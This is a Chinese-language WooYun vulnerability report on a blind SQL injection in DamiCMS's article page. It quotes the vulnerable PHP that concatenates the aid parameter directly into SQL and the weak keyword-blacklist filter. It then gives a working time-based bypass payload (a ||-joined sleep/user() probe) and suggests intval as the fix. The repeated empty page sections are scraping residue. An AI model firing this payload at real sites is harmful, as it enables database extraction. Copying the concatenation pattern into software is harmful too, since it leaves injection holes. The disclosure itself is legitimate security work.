大米CMS某处SQL盲注绕过防御 | wooyun-2014-081510| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-081510

漏洞标题：大米CMS某处SQL盲注绕过防御

漏洞作者： xfkxfk

提交时间：2014-11-03 14:36

修复时间：2015-02-01 14:38

公开时间：2015-02-01 14:38

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-11-03：细节已通知厂商并且等待厂商处理中
2014-11-03：厂商已经确认，细节仅向厂商公开
2014-11-06：细节向第三方安全合作伙伴开放
2014-12-28：细节向核心白帽子及相关领域专家公开
2015-01-07：细节向普通白帽子公开
2015-01-17：细节向实习白帽子公开
2015-02-01：细节向公众公开

简要描述：

大米CMS某处SQL盲注

详细说明：

最新版大米CMS
文件/Web/Lib/Action/ArticleAction.class.php

public function index()
	{
		if(!isset($_GET['aid']))
		{
			$this->error('非法操作');
		}
		inject_check($_GET['aid']);
		inject_check($_GET['p']);
$aid = intval($_GET['aid']);
//读取数据库和缓存
ob_start();
//用于生成静态HTML
$is_build = C('IS_BUILD_HTML');
//允许参数
$allow_param = array('p','keyword');
$static_file ='./Html/'.cookie('think_template').'/articles/'.$aid;
$mid_str ='';
if(count($_REQUEST) >1)
{
foreach($_REQUEST as $k=>$v){
if($k != 'aid' && in_array($k,$allow_param)){
$mid_str .= '/'.$k.'/'.$v;
}
}
}
$static_file .= ($mid_str .'.html');
$path = './ArticleAction.class.php';
$php_file = basename($path);
parent::html_init($static_file,$php_file,$is_build);
//以下是动态代码
$article = M('article');
$config = F('basic','','./Web/Conf/');
$page_model = 'page/page_default.html';
	    //相关判断
$alist = $article->where('aid='.intval($_GET['aid']))->find();
if(!$alist)
{
alert('文章不存在或已删除!',__APP__);
}
if($alist['islink'] == 1)
{
Header('Location:'.$alist['linkurl']);
}		
if($alist['status'] == 0)
{
alert('文章未审核!',__APP__);
}
$this->assign('title',$alist['title']);
parent::tree_dir($alist['typeid'],'tree_list');
$type = M('type');
$list = $type->where('typeid='.intval($alist['typeid']))->find();
$this->assign('type',$list);
$a = M('type')->where('typeid='.$alist['typeid'])->getField('page_path');
if( $a !='' && file_exists(TMPL_PATH.cookie('think_template').'/'.$a)){
$page_model = $a;		
} 
	//网站头部
R('Public','head');
R('Public','py_link');
	//统计处理
if($alist['status'] == 1)
{
$map['hits'] = $alist['hits']+1;
//echo $_GET['aid'];
$article->where('aid='.$_GET['aid'])->save($map);
}

看最后一行：

$article->where('aid='.$_GET['aid'])->save($map);

$_GET['aid']直接进入SQL了
这里在前面有检测$_GET['aid']
inject_check($_GET['aid']);
来看看这个inject_check函数，文件/Web/Common/common.php

//防止sql注入
	function inject_check($str)
	{
		$tmp=eregi('select|insert|update|and|or|delete|\'|\/\*|\*|\.\.\/|\.\/|union|into|load_file|outfile', $str);
		if($tmp)
		{
		alert("非法操作!",3);
		}
		else
		{
			return $str;
		}
	}

这里过滤一些关键字，但是我们可以绕过进行盲注
这里可以是使用：

http://localhost/dami/index.php?s=/articles/127+||+if(hex(mid(user(),1,1))=72,sleep(1),0)

这样就可以绕过，进行盲注了

漏洞证明：

访问：

http://localhost/dami/index.php?s=/articles/127+||+if(hex(mid(user(),1,1))=72,sleep(1),0)

这是会延迟18秒，由于默认安装大米cms后数据表中有18行数据，所以这里会延迟18s
具体利用见测试代码

修复方案：

intval($_GET['aid'])

版权声明：转载请注明来源 xfkxfk@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：6

确认时间：2014-11-03 21:12

厂商回复：

谢谢

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-081510

漏洞标题：大米CMS某处SQL盲注绕过防御

相关厂商：damicms.com

漏洞作者： xfkxfk

提交时间：2014-11-03 14:36

修复时间：2015-02-01 14:38

公开时间：2015-02-01 14:38

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 xfkxfk@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-081510

漏洞标题：大米CMS某处SQL盲注绕过防御

相关厂商：damicms.com

漏洞作者： xfkxfk

提交时间：2014-11-03 14:36

修复时间：2015-02-01 14:38

公开时间：2015-02-01 14:38

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-081510"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 xfkxfk@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：